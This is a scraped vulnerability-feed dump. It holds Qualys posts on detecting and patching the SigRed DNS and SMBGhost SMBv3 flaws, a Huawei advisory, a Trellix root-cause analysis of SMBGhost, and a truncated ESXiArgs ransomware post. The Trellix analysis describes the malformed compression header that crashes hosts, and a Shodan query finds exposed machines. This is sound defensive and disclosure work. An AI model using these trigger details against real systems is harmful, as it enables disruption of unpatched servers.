bug has been actively exploited by attackers and advised users to install patches immediately.\u201d Furthermore, it added that the vulnerability has the potential to spread via malware between vulnerable computers without any user interaction. No authentication is mandatory to execute this wormable vulnerability. A nefarious actor who is successful in exploiting this vulnerability could run arbitrary code in the Local System account.\n\nThe flaw impacts only Windows DNS servers and not DNS server clients. Check Point Research team members Sagi Tzadik and Eyal Itkin have presented their research to Microsoft and shown it in a video [here](<https://www.youtube.com/watch?v=PUlMmhD5it8>).\n\nThe following components are vulnerable to CVE-2020-1350:\n\nFunction: _dns.exe!SigWireRead_\n\nVulnerability Type: _Integer Overflow leading to Heap-Based Buffer Overflow_\n\n\n\nImage Source: [Check Point](<https://www.youtube.com/watch?v=PUlMmhD5it8>)\n\n\u201cWithout any human interaction or authentication, a single exploit can start a chain reaction that would allow attacks to spread from one vulnerable machine to another,\u201d the researcher said. \u201cThis means that a single compromised machine could spread this attack throughout an organization\u2019s network within minutes of the first exploit.\u201d\n\n**Affected Windows Products**\n\nWindows Server 2004, Windows Server 2008, Windows Server 2012, Windows Server 2016, Windows Server 2019\n\n### Identify Assets, Discover, Prioritize and Remediate Using Qualys VMDR\u00ae\n\nQualys VMDR, all-in-one vulnerability management, detection and response enables: \n\n * Identification of known and unknown hosts running vulnerable Windows servers with DNS service\n * Automatic detection of vulnerabilities and misconfigurations for Windows servers\n * Prioritization of threats based on risk \n * Integrated patch deployment \n\n#### Identification of Windows Assets with DNS Running\n\nThe first step in managing vulnerabilities and reducing risk is identification of assets. VMDR enables easy identification of windows server hosts with DNS service running\n\n_operatingSystem.category1:`Windows` and services.name:`DNS` _\n\n\n\nOnce the hosts are identified, they can be grouped together with a \u2018dynamic tag\u2019, let\u2019s say \u2013 SIGRED. This helps in automatically grouping existing Windows hosts SIGRED as well as any new host that spins up with this vulnerability. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>). \n\n#### Discover SIGRED CVE-2020-1350 Vulnerability and Misconfigurations \n\nNow that the windows hosts with SIGRED are identified, you want to detect which of these assets have flagged this vulnerability. VMDR automatically detects new vulnerabilities like SIGRED based on the always-updated Knowledgebase.\n\nYou can see all your impacted hosts for this vulnerability tagged with the \u2018SIGRED\u2019 asset tag in the vulnerabilities view by using QQL query:\n\n_vulnerabilities.vulnerability.qid: 916_62\n\nThis will return a list of all impacted hosts.\n\n\n\nAlong with the QID 91662, Qualys released the following IG QID 45451 to help customers track assets on which they have the mitigation applied. This QID can be detected using authenticated scanning or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>).\n\n_QID 45451: Microsoft KB4569509 Mitigation Guidance for DNS Server Applied (CVE-2020-1350). _\n\nThese QIDs are included in signature version VULNSIGS-2.4.942-2 and above.\n\nUsing VMDR, QID 91662 can be prioritized for the following RTIs:\n\n * Remote Code Execution\n * Unauthenticated Exploitation\n * Public Exploit\n * Denial of Service\n * Easy Exploit\n * High Data Loss\n * Wormable\n * Predicted High Risk\n * Privilege Escalation\n * High Lateral Movement\n\n\nVMDR also enables you to stay on top of these threats proactively via the \u2018live feed\u2019 provided for threat prioritization. With \u2018live feed\u2019 updated for all emerging high and medium risks, you can clearly see the impacted hosts against threats. \n\n\n\nSimply click on the impacted assets for the SIGRED threat feed to see the vulnerability and impacted host details. \n\nWith VM Dashboard, you can track SIGRED, impacted hosts, their status and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of SIGRED vulnerability trends in your environment using [Microsoft SIGRED RCE Vulnerability Dashboard](<https://qualys-secure.force.com/customers/articles/Knowledge/000006377>).\n\n\n\n**Configuration management adds context to overall vulnerability management**\n\nTo reduce the overall security risk, it is important to take care of Windows system misconfigurations as well. Qualys VMDR shows your Windows system misconfiguration posture in context with your vulnerability posture, allowing you to see which hosts have SIGRED RCE vulnerability. \n\nWith the [Qualys Policy Compliance](<https://community.qualys.com/policy-compliance/>) module of VMDR, you can automatically discover the status of the \u2018DNS\u2019 service and if they have misconfigurations in context to the SIGRED vulnerability. \n\n * Qualys configuration ID \u2013 18935 &quot;Status of the &#x27;TcpReceivePacketSize&#x27; parameter within the &#x27;HKLM\\System\\CurrentControlSet\\Services\\DNS\\Parameters&#x27; registry key&quot; would be evaluated against all Windows DNS servers as shown below\n\n\n#### Risk-Based Prioritization of SIGRED RCE Vulnerability \n\nNow that you have identified the hosts, versions and context of detected vulnerabilities and misconfigurations, you may want to prioritize your remediation based on the risk, as each vulnerable asset might not pose the same risk. \n\n**High Risk: ** \n\n * Hosts with DNS enabled and patch or workaround not applied are at high risk. \n * If due to business reasons it is not possible to apply the patch on the hosts for which CVE-2020-1350 is detected. Customers can check for misconfigurations (CID 18935 controls are failing) as shown below. \n\n\n**Medium Risk:** \n\n * Hosts with DNS enabled for which CVE-2020-1350 is detected, however, the configuration 18935 is detected as hardened are at medium risk.\n\n### Response by Patching and Remediation \n\nVMDR rapidly remediates the Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select \u201ccve:`CVE-2020-1350`\u201d in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go for hosts grouped together by a tag \u2013 SIGRED. \n\nFor proactive, continuous patching, you can create a daily job with a 24-hour \u201cPatch Window\u201d to ensure all hosts will continue to receive the required patches as new patches become available for emerging vulnerabilities. \n\nUsers are encouraged to apply patches as soon as possible.\n\n\n\nIn cases where due to business reasons it is not possible to apply patches, it is recommended that you reduce your security risk by remediating the related configuration settings for all running DNS Windows servers as provided in [Qualys Policy Compliance](<https://community.qualys.com/policy-compliance/>) by applying the following workarounds:\n\n**Workarounds**\n\nRegistry modification\n\n_HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters_\n\n_DWORD = TcpReceivePacketSize_\n\n_Value = 0xFF00_\n\nNote: You must restart the DNS Service for the workaround to take effect.\n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting and patching critical SIGRED RCE vulnerability CVE-2020-1350.", "cvss3": {}, "published": "2020-07-20T20:45:55", "type": "qualysblog", "title": "Automatically Discover, Prioritize and Remediate Windows DNS Vulnerability (SigRed \u2013 CVE-2020-1350) Using Qualys VMDR\u00ae", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-1350"], "modified": "2020-07-20T20:45:55", "id": "QUALYSBLOG:8028F138635C78F91B08AB2CF72FA154", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-20T19:37:53", "description": "This month's [Patch Tuesday](<https://blog.qualys.com/laws-of-vulnerabilities/2020/03/10/march-2020-patch-tuesday-115-vulns-26-critical-microsoft-word-and-workstation-patches>), Microsoft disclosed a remote code execution vulnerability in SMB 3.1.1 (v3) protocol. Even though initial release of the Patch Tuesday did not mention this vulnerability, details of the issue (CVE-2020-0796) were published accidentally on another security vendor\u2019s blog. Microsoft published [security advisory ADV200005](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200005>) and [technical guidance](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>) soon after the accidental disclosure of the vulnerability.\n\n**UPDATE March 12, 2020**: Microsoft updated [ ADV200005](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200005>) to include CVE-2020-0796 and released patches for affected Windows systems.\n\n### The Vulnerability\n\nA critical remote code execution vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 protocol handles certain requests. An unauthenticated attacker could exploit the vulnerability to execute arbitrary code on SMB server by sending a specially crafted packet to a targeted SMBv3 Server. To exploit the vulnerability against an SMB Client, an unauthenticated attacker would need to configure a malicious SMBv3 Server and convince a user to connect to it.\n\n**Affected Operating Systems**\n\n * Windows 10 Version 1903 for 32-bit Systems\n * Windows 10 Version 1903 for ARM64-based Systems\n * Windows 10 Version 1903 for x64-based Systems\n * Windows 10 Version 1909 for 32-bit Systems\n * Windows 10 Version 1909 for ARM64-based Systems\n * Windows 10 Version 1909 for x64-based Systems\n * Windows Server, version 1903 (Server Core installation)\n * Windows Server, version 1909 (Server Core installation)\n\nMicrosoft released patches and have provided workarounds in a [security advisory](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV200005>): disable SMBv3 compression and block the 445 TCP port on client computers and firewalls to prevent attackers from exploiting the vulnerability.\n\n###### Exploits/PoC:\n\n**Update**: There were no reports of active exploitation or PoC available in public domain at the time of initial release of this post. \nOn March 12, [Kryptos Logic](<https://twitter.com/kryptoslogic/status/1238057276738592768>) published a proof-of-concept, demonstrating the use of exploit code to crash vulnerable hosts (Denial of Service). \nOn March 13, a POC was published on [GitHub](<https://github.com/eerykitty/CVE-2020-0796-PoC>) that explained how \"CVE-2020-0796 is caused by a lack of bounds checking in offset size, which is directly passed to several subroutines. Passing a large value causes buffer overflow, and crash the kernel. With further work, this could be developed into a RCE exploit.\"\n\nSystems with port 445 exposed to the Internet are at high risk for this vulnerability.\n\n### Detecting CVE-2020-0796 with Qualys VM\n\nQualys has issued QID 91614 for [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>) that covers CVE-2020-0796 across all impacted operating systems. This QID will be included in signature version VULNSIGS-2.4.837-4, and requires authenticated scanning or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>). Cloud Agents will automatically receive this new QID as part of manifest version 2.4.837.4-3. Details of the detection are also available at [Microsoft Security Alert: March 10, 2020](<https://www.qualys.com/research/security-alerts/2020-03-10/microsoft>).\n\n_QID 91614 : Microsoft Guidance for Disabling SMBv3 Compression Not Applied (ADV200005)_\n\nThis QID checks if SMBv3 is enabled on the host and if the following workaround is not applied -\n\n_\"HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameter\"; \nDisableCompression -Type DWORD -Value 1_\n\n**Update**: Qualys released QID 91616 to check for patches applied for CVE-2020-0796 across all impacted operating systems using authenticated scanning or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>). All new changes are included in signature version VULNSIGS-2.4.841-3.\n\nQID 91616: Microsoft Windows SMBv3 Compression Remote Code Execution Vulnerability (KB4551762)\n\nDetails on Qualys QIDs 91614 and 91616:\n\nIf you have not applied SMBv3 [KB4551762](<https://support.microsoft.com/en-us/help/4551762/windows-10-update-kb4551762>) patch or SMBv3 workaround:\n\nQIDs 91614 and 91616 will be posted in the scan results.\n\nIf you have applied SMBv3 workaround, but SMBv3 [KB4551762](<https://support.microsoft.com/en-us/help/4551762/windows-10-update-kb4551762>) patch is not applied on the host:\n\nQID 91616 will be posted in the scan results.\n\nIf SMBv3 [KB4551762](<https://support.microsoft.com/en-us/help/4551762/windows-10-update-kb4551762>) patch is applied on the host:\n\nNo QID will be posted in the scan result.\n\n \n\nAlong with the two confirmed vulnerability QIDs, Qualys also released the following IG QID, to help customers track assets on which they have the mitigation applied. This QID can be detected via remote unauthenticated and authenticated scans or via Qualys Cloud Agent.\n\n_QID 48086: Microsoft Server Message Block (SMBv3) Compression Disabled_\n\nYou can search within the [VM Dashboard](<http://href=&quot;https://discussions.qualys.com/docs/DOC-6446-dashboard-toolbox-new-vulnerability-management-vm-dashboard-beta>) by using the following QQL query:\n\n_vulnerabilities.vulnerability.cveIds:CVE-2020-0796_ \n_vulnerabilities.vulnerability.qid:91614_\n\n\n\n \n\n### Detection Dashboard\n\nYou can also track all hosts impacted by CVE-2020-0796 vulnerability in your environment with the [Microsoft RCE SMBv3 Vulnerability Dashboard](<https://discussions.qualys.com/docs/DOC-7092-dashboard-toolbox-vm-dashboard-microsoft-rce-smbv3-advisory-cve-2020-0796>) that leverages data in your Qualys Vulnerability Management subscription, as shown below:\n\n\n\n \n\n### Qualys Threat Protection\n\nQualys customers can locate vulnerable hosts through [Qualys Threat Protection.](<https://www.qualys.com/apps/threat-protection/>) This helps accelerate identification and tracking of this vulnerability.\n\n\n\nSimply click on the impacted assets number to see a list of hosts with this vulnerability.\n\n### Workaround\n\n * **Disable SMBv3 compression**\n\nYou can disable compression to block unauthenticated attackers from exploiting the vulnerability against an SMBv3 Server with the PowerShell command below -\n\n_Set-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\" DisableCompression -Type DWORD -Value 1 -Force_\n\n * **Block TCP port 445 at the enterprise perimeter firewall**\n\nTCP port 445 is used to initiate a connection with the affected component. Blocking this port at the network perimeter firewall will help protect systems that are behind that firewall from attempts to exploit this vulnerability.\n\n### Remediation\n\nCustomers should install patch updates [KB4551762](<https://support.microsoft.com/en-us/help/4551762/windows-10-update-kb4551762>) for affected operating systems to be protected from this vulnerability.", "cvss3": {}, "published": "2020-03-11T23:38:37", "type": "qualysblog", "title": "Microsoft Windows SMBv3 Remote Code Execution Vulnerability (CVE-2020-0796)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-11T23:38:37", "id": "QUALYSBLOG:22A5C3C4F56D3B499B24DF2E1626F4C1", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2020/03/11/microsoft-windows-smbv3-remote-code-execution-vulnerability-cve-2020-0796", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-17T19:36:24", "description": "This month\u2019s [Patch Tuesday](<https://blog.qualys.com/laws-of-vulnerabilities/2020/03/10/march-2020-patch-tuesday-115-vulns-26-critical-microsoft-word-and-workstation-patches>), Microsoft disclosed a critical \u201cwormable\u201d remote code execution (RCE) vulnerability in Microsoft Server Message Block 3.1.1 (SMBv3) protocol. The exploitation of this vulnerability opens systems up to a 'wormable' attack, which means it would be easy to move from victim to victim.\n\nQualys released a blog post earlier on how to identify SMBv3 vulnerability in your environment: \n[Microsoft Windows SMBv3 Remote Code Execution Vulnerability (CVE-2020-0796)](<https://blog.qualys.com/laws-of-vulnerabilities/2020/03/11/microsoft-windows-smbv3-remote-code-execution-vulnerability-cve-2020-0796>)\n\nHere we describe how to resolve it with Qualys VMDR\u00ae.\n\n### Identify Assets, Discover, Prioritize and Remediate using Qualys VMDR\u00ae\n\nQualys VMDR, all-in-one vulnerability management, detection and response enables: \n\n * Identification of known and unknown hosts running vulnerable SMBv3 servers and clients\n * Automatic detection of vulnerabilities and misconfigurations for SMBv3 servers and clients\n * Prioritization of threats based on risk\n * Integrated patch deployment \n\n#### Identification of Assets with SMBv3 Server or Client\n\nThe first step in managing vulnerabilities and reducing risk is identification of assets. VMDR enables easy identification of hosts with SMBv3 Server/Client with open port \"445\" \u2013\n\n_operatingSystem.category:`Windows/Server` and openPorts.port:445_\n\n \n_operatingSystem.category:`Windows/Client` and openPorts.port:445_\n\n\n\nUsing VMDR, you can also identify SMBv3 is enabled on the host via Qualys IG QID 45262 as shown below:\n\n\n\nOnce the hosts are identified, they can be grouped together with a \u2018dynamic tag\u2019, eg \u2013 SMBv3. This helps in automatically grouping existing hosts with SMBv3 Server/Client as well as any new host spins up with SMBv3 server. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>).\n\n#### Discover SMBv3 RCE Vulnerabilities and Misconfigurations\n\nNow that the hosts with SMBv3 Client/Server are identified, you want to detect which of these assets have flagged the CVE-2020-0796 vulnerability. VMDR automatically detects new vulnerabilities like CVE-2020-0796 based on the always updated Knowledgebase.\n\nYou can see all your impacted hosts for CVE-2020-0796 (or by Qualys ID: 91614 or 91616) for your \u2018SMBv3\u2019 asset tag in vulnerabilities view by using QQL query:\n\n_vulnerabilities.vulnerability.cveIds:`CVE-2020-0796`_\n\nThis will return a list of all impacted hosts.\n\n\n\nQID 91616 helps identify assets with patch ([KB4551762](<https://support.microsoft.com/en-us/help/4551762/windows-10-update-kb4551762>)) applied and QID 91614 helps identify assets with SMBv3 workaround applied for CVE-2020-0796 across all impacted operating systems using authenticated scanning or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>). \nAlong with the two confirmed vulnerability QIDs, Qualys released the following IG QID 48086, to help customers track assets on which they have the mitigation applied. This QID can be detected via remote unauthenticated and authenticated scans or via Qualys Cloud Agent.\n\n_QID 48086: Microsoft Server Message Block (SMBv3) Compression Disabled. _\n\nVMDR also enables you to stay on top of these threats proactively via the \u2018live feed\u2019 provided for threat prioritization. With \u2018live feed\u2019 updated for all emerging high and medium risks, you can clearly see the impacted hosts against threats. \n\n\n\nSimply click on the impacted assets for the SMBv3 threat feed to see the vulnerability and impacted host details.\n\nWith VM Dashboard, you can track SMBv3 vulnerabilities, impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of SMBv3 RCE vulnerability trends in your environment using [Microsoft RCE SMBv3 Vulnerability Dashboard](<https://discussions.qualys.com/docs/DOC-7092-dashboard-toolbox-vm-dashboard-microsoft-rce-smbv3-advisory-cve-2020-0796>) -\n\n\n\n**Configuration management adds context to overall vulnerability management**** ** \n\n\nTo overall reduce the security risk, it is important to take care of SMB server misconfigurations as well. Qualys VMDR shows your SMBv3 misconfiguration posture in context with your vulnerability posture, allowing you to see which hosts have SMBv3 RCE vulnerability. It also shows SMBv3 misconfigurations, elevating the risk for these hosts compared to the hosts for which there may be a vulnerability but where the default port 445 is not used or the configuration is already hardened. \n \nWith [Qualys Policy Compliance](<https://community.qualys.com/policy-compliance/>) module of VMDR, you can automatically discover open ports or firewall restricted port 445 and if they have misconfigurations in context to CVE-2020-0796 vulnerability.\n\n * Qualys configuration ID \u2013 11220 \u201cList of 'Inbound Rules' configured in Windows Firewall with Advanced Security\u201d would be evaluated against to identify if port 445 is blocked in windows firewall inbound rules as shown below -\n\n\n\n * Qualys configuration ID \u2013 14297 \u201cStatus of the open network connections and listening ports\u201d would be evaluated to identify if port 445 is open and listening as shown below -\n\n\n\n * Qualys UDC configuration ID \u2013 101849 \u201cStatus of 'CompressionEnabled'\u201d (UDC type: \u201cRegistry Value Content Check\u201d) would be evaluated to verify if the value of \"DisableCompression\" is set to \"1\" as shown below:\n\n\n\n#### \n\n#### Risk-Based Prioritization of SMBv3 RCE Vulnerability\n\nNow that you have identified the hosts, versions and context of detected vulnerabilities and misconfigurations, you may want to prioritize your remediation based on the risk, as each vulnerable asset might not pose the same risk. \n\n\n**High Risk****:**** **\n\n * Hosts with SMBv3 enabled and patch or workaround not applied are at high risk. \n * If due to the business reasons it is not possible to apply the patch on the hosts for which CVE-2020-0796 is detected. Customers can check for misconfigurations (CIDs 14297 and 101849 controls are failing) as shown below-\n\n\n\n\n\n**Medium Risk:**\n\n * Hosts with SMBv3 enabled for which CVE-2020-0796 is detected, however, the configuration 101849 is detected as hardened are at medium risk.\n\n\n\n \n\n### Response by Patching and Remediation\n\nVMDR rapidly remediates the Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select \"cve:`CVE-2020-0796`\" in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go for hosts grouped together by a tag \u2013 SMBv3.\n\nFor proactive, continuous patching, you can create a daily job with a 24-hour \u201cPatch Window\u201d to ensure all hosts will continue to receive the required patches as new patches become available for the emerging vulnerabilities.\n\nUsers are encouraged to apply patches as soon as possible.\n\n\n\nIn cases where due to business reasons, it is not possible to apply patches, it is recommended that you reduce your security risk by remediating the related configuration settings for all running SMBv3 servers as provided in [Qualys Policy Compliance](<https://community.qualys.com/policy-compliance/>) by applying following workarounds:\n\n * **Disable SMBv3 compression**\n\nYou can disable compression to block unauthenticated attackers from exploiting the vulnerability against an SMBv3 Server with the PowerShell command below -\n\n_Set-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\" DisableCompression -Type DWORD -Value 1 -Force_\n\n * **Block TCP port 445 at the enterprise perimeter firewall**\n\nTCP port 445 is used to initiate a connection with the affected component. Blocking this port at the network perimeter firewall will help protect systems that are behind that firewall from attempts to exploit this vulnerability.\n\n### \n\n \n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting and patching critical SMBv3 RCE vulnerability CVE-2020-0796.", "cvss3": {}, "published": "2020-03-16T23:34:12", "type": "qualysblog", "title": "Automatically Discover, Prioritize and Remediate Microsoft SMBv3 RCE Vulnerability (CVE-2020-0796) using Qualys VMDR", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-16T23:34:12", "id": "QUALYSBLOG:016288CBC518BC4CE318130A921071C2", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2020/03/16/automatically-discover-prioritize-and-remediate-microsoft-smbv3-rce-vulnerability-cve-2020-0796-using-qualys-vmdr", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "huawei": [{"lastseen": "2023-12-02T20:12:21", "description": "Microsoft's security update in July 2020 addresses the CVE-2020-1350 vulnerability. To exploit the vulnerability, an unauthenticated attacker could send specially crafted requests to a Windows DNS server. An attacker who successfully exploited the vulnerability could run arbitrary code remotely. (Vulnerability ID: HWPSIRT-2020-59863)\n\nHuawei has released software updates to fix this vulnerability. This advisory is available at the following link:\n\n[http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200716-01-dns-en](<http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200716-01-dns-en>)\n\n \n\n\n[](<http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200701-01-upnp-en>)\n\n[](<http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200610-02-phone-en>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-07-16T00:00:00", "type": "huawei", "title": "Security Advisory - Windows DNS Server Remote Code Execution Vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1350"], "modified": "2020-07-16T00:00:00", "id": "HUAWEI-SA-20200716-01-DNS", "href": "https://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200716-01-dns-en", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "trellix": [{"lastseen": "2020-03-12T00:00:00", "description": "#### ARCHIVED STORY\n\n# SMBGhost \u2013 Analysis of CVE-2020-0796\n\nBy Eoin Carrol \\- March 12, 2020\n\n### The Vulnerability\n\nThe latest vulnerability in SMBv3 is a \u201cwormable\u201d vulnerability given its potential ability to replicate or spread over network shares using the latest version of the protocol (SMB 3.1.1). As of this writing, Microsoft have just released a [patch](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>) for CVE-2020-0796 on the morning of March 12th. The bug was introduced very recently, in the decompression routines for SMBv3 data payloads. The code implementing this was deployed in April 2019 for Version 1903 and November 2019 for version 1909.\n\nThe vulnerability occurs during the processing of a malformed compressed message. The header of the message follows this format: (from [[MS-SMB2]](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/5606ad47-5ee0-437a-817e-70c366052962>))\n\n **SMB2 COMPRESSION_TRANSFORM_HEADER** \n\n\n * There are two parameters in the header that are of interest: OriginalCompressedSegmentSize and Offset/Length\n * The Srv2DecompressData (srv2.sys) function allocates a buffer of size OriginalCompressedSegmentSize + Offset/Length\n * This is not checking the signedness of these values, and as the addition is signed an attacker can allocate a buffer smaller than intended\n * Data is being decompressed at buffer + offset, using data from packet+0x10+offset\n * OriginalCompressedSegmentSize is used as the UncompressedBufferSize parameter passed to SmbCompressionDecompression which is a wrapper for [RtlDecompressBufferEx2](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-rtldecompressbufferex2>)\n * This routine assumes the uncompressed buffer size to be an unsigned long so a negative value gets cast into a large unsigned number\n * Because of this, the decompression routine decompresses the buffer and can go well beyond the original size, as it is assuming it has a very large buffer to work with\n\nHere\u2019s an annotated disassembly of the relevant function on the server side:\n\n **Annotated Disassembly of the Relevant Function on the Server Side - 1** \n \n **Annotated Disassembly of the Relevant Function on the Server Side - 2** \n\n\nThis flaw can affect both client and server in SMB negotiations in a compressed message sent after the Negotiate Protocol Responses. The server vulnerability is within srv2.sys and the client vulnerability is within mrxsmb.sys which both end up calling the same code in SmbCompressDecompress.\n\nHere\u2019s an annotated disassembly of the relevant function on the client side \u2013 unlike the server side the OriginalCompressedSegmentSize is bounds checked but there is no check on offset/length before they are combined and passed to ExAllocatePoolWithtag. We have confirmed the BSOD crash from both client-&gt;server AND server-client using this vulnerability.\n\n **Annotated Disassembly of the Relevant Function on the Client Side - 1** \n\n\nIf a computer allows inbound SMB3 traffic over port 445, by default compression is supported and the client and server will negotiate the \u201cterms\u201d of this compression and then the client will proceed to transfer a compressed payload.\n\n **SMB3 traffic over port 445** \n\n\nThe flaw is present in the SMB Compression Transform Header, prior to any kind of authentication.\n\n **SMB Compression Transform Header** \n\n\nWe can see the very large OriginalSize used for attacker-controlled data (4294967295 is 0xFFFFFFFF in hex which is also -1 if viewed as a signed long). This is copied into a smaller fixed buffer and results in a classic buffer overflow. Of note is the ProtocolID of \\xfcSMB, which must be present and represents the magic bytes used to indicate the message must be decompressed per the [spec](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/5606ad47-5ee0-437a-817e-70c366052962>).\n\n **Classic Buffer Overflow** \n\n\nHowever, it is not just the server-side which is vulnerable to this attack. If a client connects to a malicious SMB server, both sides run the same vulnerable code and a malicious server can respond to client requests in the same way to trigger the overflow on the initiator/client side. In this scenario, the Windows Powershell command referenced [here](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>) will **not** be effective in stopping this attack against the SMB client. It will only be useful when implemented on the SMB server/recipient side pre-authentication.\n\n### Exposure\n\nAs always, this kind of patch should be applied as soon as possible, subject to organizational policy. While there are currently no known exploits in the wild, as you will see, causing a BSOD (blue screen of death), is quite trivial, and remains a highly effective attack method for disruption if an attacker can gain access to an internal network.\n\nMore dangerous yet are any systems exposing port 445 to the Internet, as we have seen the damage possible through similar bugs such as WannaCry. As of the time of this writing and just prior to Microsoft releasing its patch, Shodan.io appears to have just over 35,000 Windows computers reporting the vulnerable versions of software as searched by: port:445 os: \u201cWindows\u201d + os: \u201c18362\u201d for example. Many of these will likely be patched quickly now that a fix is out.\n\n **Vulnerable Versions of Software** \n\n\n### Patch Analysis\n\n **Patched Version** \n\n\nLooking at the patched version, we can see the code is now using [RtlULongAdd](<https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntintsafe/nf-ntintsafe-rtlulongadd>) to add OriginalCompressedSegmentSize and the Offset/Length value. There also seem to be an extra test to make sure the size is not bigger than the whole packet plus 0x134.\n\nLooking a little further, we can also see the usage of RtULongSub for computing the size of the compressed buffer while accounting for the offset field.\n\n **RtULongSub** \n\n\nFinally, we can also notice the usage of [WPP](<https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/wpp-software-tracing>) tracing code in case an error occurs (tracing was already occurring throughout the driver, but this specific function was not previously instrumented in such a way).\n\n### Impact \u2013 BSOD vs. RCE\n\nGetting a Blue Screen of Death or BSOD is a straightforward exercise. Pivoting from that to full remote code execution will likely be more challenging, as additional bugs will likely be required to bypass Windows\u2019 latest mitigation techniques, such as Kernel ASLR or KASLR. For this bug, the attacker will have easy primitives for the allocation of data and can control the size of the data used to trigger the overflow. On the flip side, the objects allocated in memory to store the attacker input are freed relatively quickly, making exploitation more difficult.\n\n **Blue Screen of Death or BSOD** \n\n", "cvss3": {}, "published": "2020-03-12T00:00:00", "type": "trellix", "title": "SMBGhost \u2013 Analysis of CVE-2020-0796", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-12T00:00:00", "id": "TRELLIX:2B3D0A6BA3EBF591AD9C79B99C00C6A8", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/smbghost-analysis-of-cve-2020-0796.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-09T00:00:00", "description": "# Global ESXiArgs Ransomware Attack on the Back of a Two-Year-Old Vulnerability\n\nBy John Fokker, Alfred Alvarado, Tim Hux, Jeffrey Sman, Joao Marques \u00b7 February 09, 2023\n\n _Figure 1: Global Telemetry from Trellix ATLAS for Ips connecting to port 427_ \n\n\n## Introduction:\n\nEarly this week, VMware issued a publication regarding a massive global ransomware campaign targeting \u201cEnd of General Support (EOGS) and/or significantly out-of-date ESXi products.\u201d The vulnerability ransomware actors targeted is CVE-2021-21974 and allows an attacker to exploit the OpenSLP protocol if the affected server is exposed to the internet. VMware remediated the vulnerability and released a patch that has been available for general deployment as of February 23, 2021, as a precaution VMware also disabled the OpenSLP protocol by default for future product installations.\n\n## What is the OpenSLP protocol?\n\nOpenSLP, the Open Service Location Protocol, was designed to allow machines in a local area network to discover services within the 